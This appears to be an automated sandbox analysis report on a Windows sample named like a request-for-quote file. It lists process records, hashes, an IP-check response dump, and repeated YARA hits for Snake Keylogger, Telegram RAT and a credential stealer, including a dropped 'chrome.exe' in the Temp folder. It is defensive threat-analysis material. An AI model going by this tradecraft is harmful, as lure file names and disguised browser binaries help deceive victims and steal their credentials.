                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 34 2e 31 37 2e 35 32 2e 31 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 84.17.52.19</body></html>



                                  Target ID:0
                                  Start time:18:59:56
                                  Start date:23/05/2022
                                  Path:C:\Users\user\Desktop\RFQ__637456464647.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Users\user\Desktop\RFQ__637456464647.exe"
                                  Imagebase:0xd20000
                                  File size:2844160 bytes
                                  MD5 hash:B4BC907E8D48E8F09B4D9FDD8D416599
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:.Net C# or VB.NET
                                  Yara matches:
                                  • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000000.00000000.295208630.00000000047A4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000000.295208630.00000000047A4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000000.295208630.00000000047A4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000000.295208630.00000000047A4000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                  • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000000.00000000.300985988.00000000047A4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000000.300985988.00000000047A4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000000.300985988.00000000047A4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000000.300985988.00000000047A4000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                  • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000000.00000002.318129181.00000000047A4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.318129181.00000000047A4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.318129181.00000000047A4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.318129181.00000000047A4000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                  • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000000.00000000.293530185.0000000004504000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000000.293530185.0000000004504000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000000.293530185.0000000004504000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000000.293530185.0000000004504000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                  • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000000.00000000.292477124.00000000042C9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000000.292477124.00000000042C9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000000.292477124.00000000042C9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000000.292477124.00000000042C9000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                  • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000000.00000000.300121250.0000000004504000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000000.300121250.0000000004504000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000000.300121250.0000000004504000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000000.300121250.0000000004504000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                  • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000000.00000002.317016109.00000000042C9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.317016109.00000000042C9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.317016109.00000000042C9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.317016109.00000000042C9000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                  • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000000.00000002.317478170.0000000004504000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.317478170.0000000004504000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.317478170.0000000004504000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.317478170.0000000004504000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                  • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000000.00000000.299489390.00000000042C9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000000.299489390.00000000042C9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000000.299489390.00000000042C9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000000.299489390.00000000042C9000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                  Reputation:low

                                  Target ID:1
                                  Start time:18:59:58
                                  Start date:23/05/2022
                                  Path:C:\Users\user\Desktop\RFQ__637456464647.exe
                                  Wow64 process (32bit):true
                                  Commandline:C:\Users\user\Desktop\RFQ__637456464647.exe
                                  Imagebase:0x8f0000
                                  File size:2844160 bytes
                                  MD5 hash:B4BC907E8D48E8F09B4D9FDD8D416599
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:.Net C# or VB.NET
                                  Yara matches:
                                  • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000001.00000000.267692324.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000001.00000000.267692324.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000000.267692324.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000001.00000000.267692324.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                  • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000001.00000000.266228380.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000001.00000000.266228380.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000000.266228380.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000001.00000000.266228380.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                  • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000001.00000002.525677202.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000001.00000002.525677202.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.525677202.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000001.00000002.525677202.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                  • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000001.00000000.270358708.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000001.00000000.270358708.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000000.270358708.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000001.00000000.270358708.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                  • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000001.00000000.268966946.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000001.00000000.268966946.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000000.268966946.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000001.00000000.268966946.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                  Reputation:low

                                  Target ID:5
                                  Start time:19:00:08
                                  Start date:23/05/2022
                                  Path:C:\Users\user\AppData\Local\Temp\chrome.exe
                                  Wow64 process (32bit):false
                                  Commandline:"C:\Users\user\AppData\Local\Temp\chrome.exe"
                                  Imagebase:0x7ff7a8a70000
                                  File size:2622352 bytes
                                  MD5 hash:7F916511A313837EFCDE9E4112A64E5B
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Antivirus matches:
                                  • Detection: 0%, Metadefender
                                  • Detection: 0%, ReversingLabs
                                  Reputation:low

                                  Target ID:13
                                  Start time:19:00:19
                                  Start date:23/05/2022
                                  Path:C:\Windows\SysWOW64\WerFault.exe
                                  Wow64 process (32bit):true
                                  Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6312 -s 1296
                                  Imagebase:0xf40000
                                  File size:434592 bytes
                                  MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:.Net C# or VB.NET
                                  Reputation:high

                                  No disassembly